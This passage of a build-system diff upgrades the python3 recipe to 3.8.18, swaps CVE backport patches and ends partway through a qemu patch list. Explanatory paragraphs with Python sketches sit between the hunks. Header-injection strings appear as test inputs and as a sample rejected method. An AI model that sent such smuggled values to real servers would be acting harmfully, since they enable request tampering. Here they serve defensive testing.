+ 1 file changed, 2 insertions(+)
+
+diff --git a/Lib/ctypes/test/test_find.py b/Lib/ctypes/test/test_find.py
+index 92ac184..0d009d1 100644
+--- a/Lib/ctypes/test/test_find.py
++++ b/Lib/ctypes/test/test_find.py
+@@ -112,10 +112,12 @@ class FindLibraryLinux(unittest.TestCase):
+ # LD_LIBRARY_PATH)
+ self.assertEqual(find_library(libname), 'lib%s.so' % libname)
+
++ @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
+ def test_find_library_with_gcc(self):
+ with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None):
+ self.assertNotEqual(find_library('c'), None)
+
++ @unittest.skip("Needs IMAGE_FEATURES += \"tools-sdk\"")
+ def test_find_library_with_ld(self):
+ with unittest.mock.patch("ctypes.util._findSoname_ldconfig", lambda *args: None), \
+ unittest.mock.patch("ctypes.util._findLib_gcc", lambda *args: None):
diff --git a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
index 35b7e0c480..f9d2eadc11 100644
--- a/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
+++ b/meta/recipes-devtools/python/python3/0001-test_locale.py-correct-the-test-output-format.patch
@@ -1,6 +1,6 @@
-From b94995e0c694ec9561efec0d1a59b323340e6105 Mon Sep 17 00:00:00 2001
-From: Mingli Yu <mingli.yu@windriver.com>
-Date: Mon, 5 Aug 2019 15:57:39 +0800
+From e11787d373baa6d7b0e0d94aff8ccd373203bfb1 Mon Sep 17 00:00:00 2001
+From: Tim Orling <ticotimo@gmail.com>
+Date: Wed, 16 Jun 2021 07:49:52 -0700
Subject: [PATCH] test_locale.py: correct the test output format
Before this patch:
@@ -24,23 +24,25 @@ Before this patch:
Upstream-Status: Submitted [https://github.com/python/cpython/pull/15132]
Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+
+
+Refresh patch for upstream changes in 3.8.9
+
+Signed-off-by: Tim Orling <timothy.t.orling@intel.com>
---
Lib/test/test_locale.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Lib/test/test_locale.py b/Lib/test/test_locale.py
-index e2c2178..558d63c 100644
+index 39091c0..5050f3d 100644
--- a/Lib/test/test_locale.py
+++ b/Lib/test/test_locale.py
-@@ -527,7 +527,7 @@ class TestMiscellaneous(unittest.TestCase):
+@@ -563,7 +563,7 @@ class TestMiscellaneous(unittest.TestCase):
self.skipTest('test needs Turkish locale')
loc = locale.getlocale(locale.LC_CTYPE)
if verbose:
- print('testing with %a' % (loc,), end=' ', flush=True)
+ print('testing with %a...' % (loc,), end=' ', flush=True)
- locale.setlocale(locale.LC_CTYPE, loc)
- self.assertEqual(loc, locale.getlocale(locale.LC_CTYPE))
-
---
-2.7.4
-
+ try:
+ locale.setlocale(locale.LC_CTYPE, loc)
+ except locale.Error as exc:
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch b/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
deleted file mode 100644
index 6889e46da9..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-14422.patch
+++ /dev/null
@@ -1,77 +0,0 @@
-From dc8ce8ead182de46584cc1ed8a8c51d48240cbd5 Mon Sep 17 00:00:00 2001
-From: "Miss Islington (bot)"
- <31488909+miss-islington@users.noreply.github.com>
-Date: Mon, 29 Jun 2020 11:12:50 -0700
-Subject: [PATCH] bpo-41004: Resolve hash collisions for IPv4Interface and
- IPv6Interface (GH-21033)
-
-The __hash__() methods of classes IPv4Interface and IPv6Interface had issue
-of generating constant hash values of 32 and 128 respectively causing hash collisions.
-The fix uses the hash() function to generate hash values for the objects
-instead of XOR operation
-(cherry picked from commit b30ee26e366bf509b7538d79bfec6c6d38d53f28)
-
-Co-authored-by: Ravi Teja P <rvteja92@gmail.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/dc8ce8ead182de46584cc1ed8a8c51d48240cbd5]
-CVE: CVE-2020-14422
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- Lib/ipaddress.py | 4 ++--
- Lib/test/test_ipaddress.py | 12 ++++++++++++
- .../2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst | 1 +
- 3 files changed, 15 insertions(+), 2 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-
-diff --git a/Lib/ipaddress.py b/Lib/ipaddress.py
-index 873c7644081af..a3a04f7f4b309 100644
---- a/Lib/ipaddress.py
-+++ b/Lib/ipaddress.py
-@@ -1370,7 +1370,7 @@ def __lt__(self, other):
- return False
-
- def __hash__(self):
-- return self._ip ^ self._prefixlen ^ int(self.network.network_address)
-+ return hash((self._ip, self._prefixlen, int(self.network.network_address)))
-
- __reduce__ = _IPAddressBase.__reduce__
-
-@@ -2017,7 +2017,7 @@ def __lt__(self, other):
- return False
-
- def __hash__(self):
-- return self._ip ^ self._prefixlen ^ int(self.network.network_address)
-+ return hash((self._ip, self._prefixlen, int(self.network.network_address)))
-
- __reduce__ = _IPAddressBase.__reduce__
-
-diff --git a/Lib/test/test_ipaddress.py b/Lib/test/test_ipaddress.py
-index de77111705b69..2eba740e5e7a4 100644
---- a/Lib/test/test_ipaddress.py
-+++ b/Lib/test/test_ipaddress.py
-@@ -2053,6 +2053,18 @@ def testsixtofour(self):
- sixtofouraddr.sixtofour)
- self.assertFalse(bad_addr.sixtofour)
-
-+ # issue41004 Hash collisions in IPv4Interface and IPv6Interface
-+ def testV4HashIsNotConstant(self):
-+ ipv4_address1 = ipaddress.IPv4Interface("1.2.3.4")
-+ ipv4_address2 = ipaddress.IPv4Interface("2.3.4.5")
-+ self.assertNotEqual(ipv4_address1.__hash__(), ipv4_address2.__hash__())
-+
-+ # issue41004 Hash collisions in IPv4Interface and IPv6Interface
-+ def testV6HashIsNotConstant(self):
-+ ipv6_address1 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:1")
-+ ipv6_address2 = ipaddress.IPv6Interface("2001:658:22a:cafe:200:0:0:2")
-+ self.assertNotEqual(ipv6_address1.__hash__(), ipv6_address2.__hash__())
-+
-
- if __name__ == '__main__':
- unittest.main()
-diff --git a/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-new file mode 100644
-index 0000000000000..1380b31fbe9f4
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-06-29-16-02-29.bpo-41004.ovF0KZ.rst
-@@ -0,0 +1 @@
-+The __hash__() methods of ipaddress.IPv4Interface and ipaddress.IPv6Interface incorrectly generated constant hash values of 32 and 128 respectively. This resulted in always causing hash collisions. The fix uses hash() to generate hash values for the tuple of (address, mask length, network address).
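
This backport is likewise dropped in favour of the 3.8.18 upgrade below, which carries the fix. The old XOR hash collapses whenever the network address equals the interface address, which is always the case for the default /32 and /128 prefixes, so every such interface hashed to 32 or 128. A short check makes this concrete (sample addresses invented):

    import ipaddress

    def old_hash(iface):
        # The pre-fix formula: ip ^ prefixlen ^ network address.
        return int(iface) ^ iface.network.prefixlen ^ int(iface.network.network_address)

    a = ipaddress.IPv4Interface("1.2.3.4")   # /32 by default
    b = ipaddress.IPv4Interface("2.3.4.5")
    print(old_hash(a), old_hash(b))          # 32 32: every host interface collides
    print(hash((int(a), 32, int(a.network.network_address))),
          hash((int(b), 32, int(b.network.network_address))))  # distinct with the tuple fix
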
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch b/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
deleted file mode 100644
index c019db2a76..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-26116.patch
+++ /dev/null
@@ -1,104 +0,0 @@
-From 668d321476d974c4f51476b33aaca870272523bf Mon Sep 17 00:00:00 2001
-From: "Miss Islington (bot)"
- <31488909+miss-islington@users.noreply.github.com>
-Date: Sat, 18 Jul 2020 13:39:12 -0700
-Subject: [PATCH] bpo-39603: Prevent header injection in http methods
- (GH-18485)
-
-reject control chars in http method in http.client.putrequest to prevent http header injection
-(cherry picked from commit 8ca8a2e8fb068863c1138f07e3098478ef8be12e)
-
-Co-authored-by: AMIR <31338382+amiremohamadi@users.noreply.github.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/668d321476d974c4f51476b33aaca870272523bf]
-CVE: CVE-2020-26116
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
-
----
- Lib/http/client.py | 15 +++++++++++++
- Lib/test/test_httplib.py | 22 +++++++++++++++++++
- .../2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst | 2 ++
- 3 files changed, 39 insertions(+)
- create mode 100644 Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-
-diff --git a/Lib/http/client.py b/Lib/http/client.py
-index 019380a720318..c2ad0471bfee5 100644
---- a/Lib/http/client.py
-+++ b/Lib/http/client.py
-@@ -147,6 +147,10 @@
- # _is_allowed_url_pchars_re = re.compile(r"^[/!$&'()*+,;=:@%a-zA-Z0-9._~-]+$")
- # We are more lenient for assumed real world compatibility purposes.
-
-+# These characters are not allowed within HTTP method names
-+# to prevent http header injection.
-+_contains_disallowed_method_pchar_re = re.compile('[\x00-\x1f]')
-+
- # We always set the Content-Length header for these methods because some
- # servers will otherwise respond with a 411
- _METHODS_EXPECTING_BODY = {'PATCH', 'POST', 'PUT'}
-@@ -1087,6 +1091,8 @@ def putrequest(self, method, url, skip_host=False,
- else:
- raise CannotSendRequest(self.__state)
-
-+ self._validate_method(method)
-+
- # Save the method for use later in the response phase
- self._method = method
-
-@@ -1177,6 +1183,15 @@ def _encode_request(self, request):
- # ASCII also helps prevent CVE-2019-9740.
- return request.encode('ascii')
-
-+ def _validate_method(self, method):
-+ """Validate a method name for putrequest."""
-+ # prevent http header injection
-+ match = _contains_disallowed_method_pchar_re.search(method)
-+ if match:
-+ raise ValueError(
-+ f"method can't contain control characters. {method!r} "
-+ f"(found at least {match.group()!r})")
-+
- def _validate_path(self, url):
- """Validate a url for putrequest."""
- # Prevent CVE-2019-9740.
-diff --git a/Lib/test/test_httplib.py b/Lib/test/test_httplib.py
-index 8f0e27a1fb836..5a5fcecbc9c15 100644
---- a/Lib/test/test_httplib.py
-+++ b/Lib/test/test_httplib.py
-@@ -364,6 +364,28 @@ def test_headers_debuglevel(self):
- self.assertEqual(lines[3], "header: Second: val2")
-
-
-+class HttpMethodTests(TestCase):
-+ def test_invalid_method_names(self):
-+ methods = (
-+ 'GET\r',
-+ 'POST\n',
-+ 'PUT\n\r',
-+ 'POST\nValue',
-+ 'POST\nHOST:abc',
-+ 'GET\nrHost:abc\n',
-+ 'POST\rRemainder:\r',
-+ 'GET\rHOST:\n',
-+ '\nPUT'
-+ )
-+
-+ for method in methods:
-+ with self.assertRaisesRegex(
-+ ValueError, "method can't contain control characters"):
-+ conn = client.HTTPConnection('example.com')
-+ conn.sock = FakeSocket(None)
-+ conn.request(method=method, url="/")
-+
-+
- class TransferEncodingTest(TestCase):
- expected_body = b"It's just a flesh wound"
-
-diff --git a/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-new file mode 100644
-index 0000000000000..990affc3edd9d
---- /dev/null
-+++ b/Misc/NEWS.d/next/Security/2020-02-12-14-17-39.bpo-39603.Gt3RSg.rst
-@@ -0,0 +1,2 @@
-+Prevent http header injection by rejecting control characters in
-+http.client.putrequest(...).
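
Also dropped with the move to 3.8.18 below. The essence of the fix is a validation step that rejects control characters in the HTTP method before it is written into the request line; the same check can be restated as a standalone sketch (the helper name is invented):

    import re

    _disallowed_method_chars = re.compile('[\x00-\x1f]')  # same class as the patch

    def validate_method(method):
        match = _disallowed_method_chars.search(method)
        if match:
            raise ValueError(
                "method can't contain control characters. %r "
                "(found at least %r)" % (method, match.group()))

    validate_method("POST")                    # accepted
    try:
        validate_method("GET\r\nHost: evil")   # header-injection attempt
    except ValueError as exc:
        print(exc)
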
diff --git a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch b/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
deleted file mode 100644
index bafa1cb999..0000000000
--- a/meta/recipes-devtools/python/python3/CVE-2020-27619.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 6c6c256df3636ff6f6136820afaefa5a10a3ac33 Mon Sep 17 00:00:00 2001
-From: "Miss Skeleton (bot)" <31488909+miss-islington@users.noreply.github.com>
-Date: Tue, 6 Oct 2020 05:38:54 -0700
-Subject: [PATCH] bpo-41944: No longer call eval() on content received via HTTP
- in the CJK codec tests (GH-22566) (GH-22577)
-
-(cherry picked from commit 2ef5caa58febc8968e670e39e3d37cf8eef3cab8)
-
-Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
-
-Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
-
-Upstream-Status: Backport [https://github.com/python/cpython/commit/6c6c256df3636ff6f6136820afaefa5a10a3ac33]
-CVE: CVE-2020-27619
-Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
----
- Lib/test/multibytecodec_support.py | 22 +++++++------------
- .../2020-10-05-17-43-46.bpo-41944.rf1dYb.rst | 1 +
- 2 files changed, 9 insertions(+), 14 deletions(-)
- create mode 100644 Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-
-diff --git a/Lib/test/multibytecodec_support.py b/Lib/test/multibytecodec_support.py
-index cca8af67d6d1d..f76c0153f5ecf 100644
---- a/Lib/test/multibytecodec_support.py
-+++ b/Lib/test/multibytecodec_support.py
-@@ -305,29 +305,23 @@ def test_mapping_file(self):
- self._test_mapping_file_plain()
-
- def _test_mapping_file_plain(self):
-- unichrs = lambda s: ''.join(map(chr, map(eval, s.split('+'))))
-+ def unichrs(s):
-+ return ''.join(chr(int(x, 16)) for x in s.split('+'))
-+
- urt_wa = {}
-
- with self.open_mapping_file() as f:
- for line in f:
- if not line:
- break
-- data = line.split('#')[0].strip().split()
-+ data = line.split('#')[0].split()
- if len(data) != 2:
- continue
-
-- csetval = eval(data[0])
-- if csetval <= 0x7F:
-- csetch = bytes([csetval & 0xff])
-- elif csetval >= 0x1000000:
-- csetch = bytes([(csetval >> 24), ((csetval >> 16) & 0xff),
-- ((csetval >> 8) & 0xff), (csetval & 0xff)])
-- elif csetval >= 0x10000:
-- csetch = bytes([(csetval >> 16), ((csetval >> 8) & 0xff),
-- (csetval & 0xff)])
-- elif csetval >= 0x100:
-- csetch = bytes([(csetval >> 8), (csetval & 0xff)])
-- else:
-+ if data[0][:2] != '0x':
-+ self.fail(f"Invalid line: {line!r}")
-+ csetch = bytes.fromhex(data[0][2:])
-+ if len(csetch) == 1 and 0x80 <= csetch[0]:
- continue
-
- unich = unichrs(data[1])
-diff --git a/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-new file mode 100644
-index 0000000000000..4f9782f1c85af
---- /dev/null
-+++ b/Misc/NEWS.d/next/Tests/2020-10-05-17-43-46.bpo-41944.rf1dYb.rst
-@@ -0,0 +1 @@
-+Tests for CJK codecs no longer call ``eval()`` on content received via HTTP.
diff --git a/meta/recipes-devtools/python/python3/CVE-2023-24329.patch b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
new file mode 100644
index 0000000000..23dec65602
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/CVE-2023-24329.patch
@@ -0,0 +1,80 @@
+From 72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9 Mon Sep 17 00:00:00 2001
+From: "Miss Islington (bot)"
+ <31488909+miss-islington@users.noreply.github.com>
+Date: Sun, 13 Nov 2022 11:00:25 -0800
+Subject: [PATCH] gh-99418: Make urllib.parse.urlparse enforce that a scheme
+ must begin with an alphabetical ASCII character. (GH-99421)
+
+Prevent urllib.parse.urlparse from accepting schemes that don't begin with an alphabetical ASCII character.
+
+RFC 3986 defines a scheme like this: `scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )`
+RFC 2234 defines an ALPHA like this: `ALPHA = %x41-5A / %x61-7A`
+
+The WHATWG URL spec defines a scheme like this:
+`"A URL-scheme string must be one ASCII alpha, followed by zero or more of ASCII alphanumeric, U+002B (+), U+002D (-), and U+002E (.)."`
+(cherry picked from commit 439b9cfaf43080e91c4ad69f312f21fa098befc7)
+
+Co-authored-by: Ben Kallus <49924171+kenballus@users.noreply.github.com>
+
+Upstream-Status: Backport [https://github.com/python/cpython/commit/72d356e3584ebfb8e813a8e9f2cd3dccf233c0d9]
+CVE: CVE-2023-24329
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ Lib/test/test_urlparse.py | 18 ++++++++++++++++++
+ Lib/urllib/parse.py | 2 +-
+ ...22-11-12-15-45-51.gh-issue-99418.FxfAXS.rst | 2 ++
+ 3 files changed, 21 insertions(+), 1 deletion(-)
+ create mode 100644 Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+
+diff --git a/Lib/test/test_urlparse.py b/Lib/test/test_urlparse.py
+index 0ad3bf1..e1aa913 100644
+--- a/Lib/test/test_urlparse.py
++++ b/Lib/test/test_urlparse.py
+@@ -735,6 +735,24 @@ class UrlParseTestCase(unittest.TestCase):
+ with self.assertRaises(ValueError):
+ p.port
+
++ def test_attributes_bad_scheme(self):
++ """Check handling of invalid schemes."""
++ for bytes in (False, True):
++ for parse in (urllib.parse.urlsplit, urllib.parse.urlparse):
++ for scheme in (".", "+", "-", "0", "http&", "६http"):
++ with self.subTest(bytes=bytes, parse=parse, scheme=scheme):
++ url = scheme + "://www.example.net"
++ if bytes:
++ if url.isascii():
++ url = url.encode("ascii")
++ else:
++ continue
++ p = parse(url)
++ if bytes:
++ self.assertEqual(p.scheme, b"")
++ else:
++ self.assertEqual(p.scheme, "")
++
+ def test_attributes_without_netloc(self):
+ # This example is straight from RFC 3261. It looks like it
+ # should allow the username, hostname, and port to be filled
+diff --git a/Lib/urllib/parse.py b/Lib/urllib/parse.py
+index 979e6d2..2e7a3e2 100644
+--- a/Lib/urllib/parse.py
++++ b/Lib/urllib/parse.py
+@@ -452,7 +452,7 @@ def urlsplit(url, scheme='', allow_fragments=True):
+ clear_cache()
+ netloc = query = fragment = ''
+ i = url.find(':')
+- if i > 0:
++ if i > 0 and url[0].isascii() and url[0].isalpha():
+ if url[:i] == 'http': # optimize the common case
+ url = url[i+1:]
+ if url[:2] == '//':
+diff --git a/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+new file mode 100644
+index 0000000..0a06e7c
+--- /dev/null
++++ b/Misc/NEWS.d/next/Library/2022-11-12-15-45-51.gh-issue-99418.FxfAXS.rst
+@@ -0,0 +1,2 @@
++Fix bug in :func:`urllib.parse.urlparse` that causes URL schemes that begin
++with a digit, a plus sign, or a minus sign to be parsed incorrectly.
+--
+2.25.1
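
The added check means a URL is only treated as having a scheme when the text before the first ':' starts with an ASCII letter, so schemes beginning with a digit, '+', '-', '.' or a non-ASCII character fall through to scheme-less parsing. The condition can be tried in isolation (the helper name is invented; the real logic lives in urllib.parse.urlsplit as patched above):

    def looks_like_scheme(url):
        # Mirror of the patched condition in urlsplit().
        i = url.find(':')
        return i > 0 and url[0].isascii() and url[0].isalpha()

    for url in ("https://example.net", "0http://example.net",
                "+ssh://host", "\u096chttp://host"):
        print(url, looks_like_scheme(url))
    # only the first prints True
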
diff --git a/meta/recipes-devtools/python/python3/makerace.patch b/meta/recipes-devtools/python/python3/makerace.patch
new file mode 100644
index 0000000000..8971f28b8e
--- /dev/null
+++ b/meta/recipes-devtools/python/python3/makerace.patch
@@ -0,0 +1,23 @@
+libainstall installs python-config.py but the .pyc cache files are generated
+by the libinstall target. This means some builds may not generate the pyc files
+for python-config.py depending on the order things happen in. This means builds
+are not always reproducible.
+
+Add a dependency to avoid the race.
+
+Upstream-Status: Pending
+Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
+
+Index: Python-3.8.11/Makefile.pre.in
+===================================================================
+--- Python-3.8.11.orig/Makefile.pre.in
++++ Python-3.8.11/Makefile.pre.in
+@@ -1415,7 +1415,7 @@ LIBSUBDIRS= tkinter tkinter/test tkinter
+ unittest unittest/test unittest/test/testmock \
+ venv venv/scripts venv/scripts/common venv/scripts/posix \
+ curses pydoc_data
+-libinstall: build_all $(srcdir)/Modules/xxmodule.c
++libinstall: build_all $(srcdir)/Modules/xxmodule.c libainstall
+ @for i in $(SCRIPTDIR) $(LIBDEST); \
+ do \
+ if test ! -d $(DESTDIR)$$i; then \
diff --git a/meta/recipes-devtools/python/python3/python3-manifest.json b/meta/recipes-devtools/python/python3/python3-manifest.json
index 3bcc9b8662..0e87f91dd8 100644
--- a/meta/recipes-devtools/python/python3/python3-manifest.json
+++ b/meta/recipes-devtools/python/python3/python3-manifest.json
@@ -531,7 +531,9 @@
"rdepends": [
"core"
],
- "files": [],
+ "files": [
+ "${libdir}/python${PYTHON_MAJMIN}/distutils/command/wininst-*.exe"
+ ],
"cached": []
},
"distutils": {
diff --git a/meta/recipes-devtools/python/python3_3.8.2.bb b/meta/recipes-devtools/python/python3_3.8.18.bb
index 1d0b4cdb77..9d0f72ecf9 100644
--- a/meta/recipes-devtools/python/python3_3.8.2.bb
+++ b/meta/recipes-devtools/python/python3_3.8.18.bb
@@ -1,9 +1,10 @@
SUMMARY = "The Python Programming Language"
HOMEPAGE = "http://www.python.org"
-LICENSE = "PSFv2"
+DESCRIPTION = "Python is a programming language that lets you work more quickly and integrate your systems more effectively."
+LICENSE = "PSF-2.0 & BSD-0-Clause"
SECTION = "devel/python"
-LIC_FILES_CHKSUM = "file://LICENSE;md5=203a6dbc802ee896020a47161e759642"
+LIC_FILES_CHKSUM = "file://LICENSE;md5=07fc4b9a9c0c0e48050ed38a5e72552b"
SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
file://run-ptest \
@@ -32,10 +33,8 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \
file://0001-configure.ac-fix-LIBPL.patch \
file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \
file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \
- file://0001-bpo-39503-CVE-2020-8492-Fix-AbstractBasicAuthHandler.patch \
- file://CVE-2020-14422.patch \
- file://CVE-2020-26116.patch \
- file://CVE-2020-27619.patch \
+ file://makerace.patch \
+ file://CVE-2023-24329.patch \
"
SRC_URI_append_class-native = " \
@@ -44,19 +43,26 @@ SRC_URI_append_class-native = " \
file://0001-Don-t-search-system-for-headers-libraries.patch \
"
-SRC_URI[md5sum] = "e9d6ebc92183a177b8e8a58cad5b8d67"
-SRC_URI[sha256sum] = "2646e7dc233362f59714c6193017bb2d6f7b38d6ab4a0cb5fbac5c36c4d845df"
+SRC_URI[md5sum] = "5ea6267ea00513fc31d3746feb35842d"
+SRC_URI[sha256sum] = "3ffb71cd349a326ba7b2fadc7e7df86ba577dd9c4917e52a8401adbda7405e3f"
# exclude pre-releases for both python 2.x and 3.x
UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P<pver>\d+(\.\d+)+).tar"
CVE_PRODUCT = "python"
+# Upstream consider this expected behaviour
+CVE_CHECK_WHITELIST += "CVE-2007-4559"
# This is not exploitable when glibc has CVE-2016-10739 fixed.
CVE_CHECK_WHITELIST += "CVE-2019-18348"
# This is windows only issue.
-CVE_CHECK_WHITELIST += "CVE-2020-15523"
+CVE_CHECK_WHITELIST += "CVE-2020-15523 CVE-2022-26488"
+# The mailcap module is insecure by design, so this can't be fixed in a meaningful way.
+# The module will be removed in the future and flaws documented.
+CVE_CHECK_WHITELIST += "CVE-2015-20107"
+# Not an issue, in fact expected behaviour
+CVE_CHECK_WHITELIST += "CVE-2023-36632"
PYTHON_MAJMIN = "3.8"
@@ -73,7 +79,7 @@ ALTERNATIVE_LINK_NAME[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config
ALTERNATIVE_TARGET[python3-config] = "${bindir}/python${PYTHON_MAJMIN}-config-${MULTILIB_SUFFIX}"
-DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2"
+DEPENDS = "bzip2-replacement-native libffi bzip2 openssl sqlite3 zlib virtual/libintl xz virtual/crypt util-linux libtirpc libnsl2 autoconf-archive"
DEPENDS_append_class-target = " python3-native"
DEPENDS_append_class-nativesdk = " python3-native"
@@ -309,11 +315,8 @@ do_create_manifest() {
}
# bitbake python -c create_manifest
-addtask do_create_manifest
-
# Make sure we have native python ready when we create a new manifest
-do_create_manifest[depends] += "${PN}:do_prepare_recipe_sysroot"
-do_create_manifest[depends] += "${PN}:do_patch"
+addtask do_create_manifest after do_patch do_prepare_recipe_sysroot
# manual dependency additions
RRECOMMENDS_${PN}-core_append_class-nativesdk = " nativesdk-python3-modules"
@@ -335,6 +338,7 @@ PACKAGES =+ "libpython3 libpython3-staticdev"
FILES_libpython3 = "${libdir}/libpython*.so.*"
FILES_libpython3-staticdev += "${libdir}/python${PYTHON_MAJMIN}/config-${PYTHON_MAJMIN}-*/libpython${PYTHON_MAJMIN}.a"
INSANE_SKIP_${PN}-dev += "dev-elf"
+INSANE_SKIP_${PN}-ptest += "dev-deps"
# catch all the rest (unsorted)
PACKAGES += "${PN}-misc"
@@ -350,10 +354,16 @@ FILES_${PN}-man = "${datadir}/man"
# See https://bugs.python.org/issue18748 and https://bugs.python.org/issue37395
RDEPENDS_libpython3_append_libc-glibc = " libgcc"
RDEPENDS_${PN}-ctypes_append_libc-glibc = " ${MLPREFIX}ldconfig"
-RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests unzip bzip2 libgcc tzdata-europe coreutils sed"
+RDEPENDS_${PN}-ptest = "${PN}-modules ${PN}-tests ${PN}-dev unzip bzip2 libgcc tzdata-europe coreutils sed"
RDEPENDS_${PN}-ptest_append_libc-glibc = " locale-base-tr-tr.iso-8859-9"
RDEPENDS_${PN}-tkinter += "${@bb.utils.contains('PACKAGECONFIG', 'tk', 'tk tk-lib', '', d)}"
RDEPENDS_${PN}-dev = ""
RDEPENDS_${PN}-tests_append_class-target = " bash"
RDEPENDS_${PN}-tests_append_class-nativesdk = " bash"
+
+# Python's tests contain large numbers of files we don't need in the recipe sysroots
+SYSROOT_PREPROCESS_FUNCS += " py3_sysroot_cleanup"
+py3_sysroot_cleanup () {
+ rm -rf ${SYSROOT_DESTDIR}${libdir}/python${PYTHON_MAJMIN}/test
+}
diff --git a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
index d83ee59375..5ae6a37f26 100644
--- a/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
+++ b/meta/recipes-devtools/qemu/qemu-system-native_4.2.0.bb
@@ -9,7 +9,7 @@ DEPENDS = "glib-2.0-native zlib-native pixman-native qemu-native bison-native"
EXTRA_OECONF_append = " --target-list=${@get_qemu_system_target_list(d)}"
-PACKAGECONFIG ??= "fdt alsa kvm"
+PACKAGECONFIG ??= "fdt alsa kvm slirp"
# Handle distros such as CentOS 5 32-bit that do not have kvm support
PACKAGECONFIG_remove = "${@'kvm' if not os.path.exists('/usr/include/linux/kvm.h') else ''}"
diff --git a/meta/recipes-devtools/qemu/qemu.inc b/meta/recipes-devtools/qemu/qemu.inc
index 067179fdeb..59ff69d51d 100644
--- a/meta/recipes-devtools/qemu/qemu.inc
+++ b/meta/recipes-devtools/qemu/qemu.inc
@@ -28,35 +28,154 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \
file://0009-Fix-webkitgtk-builds.patch \
file://0010-configure-Add-pkg-config-handling-for-libgcrypt.patch \
file://0011-hw-i386-pc-fix-regression-in-parsing-vga-cmdline-par.patch \
+ file://0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch \
file://CVE-2019-15890.patch \
file://CVE-2020-1711.patch \
file://CVE-2020-7039-1.patch \
file://CVE-2020-7039-2.patch \
file://CVE-2020-7039-3.patch \
file://0001-Add-enable-disable-udev.patch \
- file://CVE-2020-7211.patch \
- file://0001-qemu-Do-not-include-file-if-not-exists.patch \
+ file://CVE-2020-7211.patch \
+ file://0001-qemu-Do-not-include-file-if-not-exists.patch \
file://CVE-2020-11102.patch \
- file://CVE-2020-11869.patch \
- file://CVE-2020-13361.patch \
- file://CVE-2020-10761.patch \
- file://CVE-2020-10702.patch \
- file://CVE-2020-13659.patch \
- file://CVE-2020-13800.patch \
- file://CVE-2020-13362.patch \
- file://CVE-2020-15863.patch \
- file://CVE-2020-14364.patch \
- file://CVE-2020-14415.patch \
- file://CVE-2020-16092.patch \
- file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \
- file://CVE-2019-20175.patch \
- file://CVE-2020-24352.patch \
- "
+ file://CVE-2020-11869.patch \
+ file://CVE-2020-13361.patch \
+ file://CVE-2020-10761.patch \
+ file://CVE-2020-10702.patch \
+ file://CVE-2020-13659.patch \
+ file://CVE-2020-13800.patch \
+ file://CVE-2020-13362.patch \
+ file://CVE-2020-15863.patch \
+ file://CVE-2020-14364.patch \
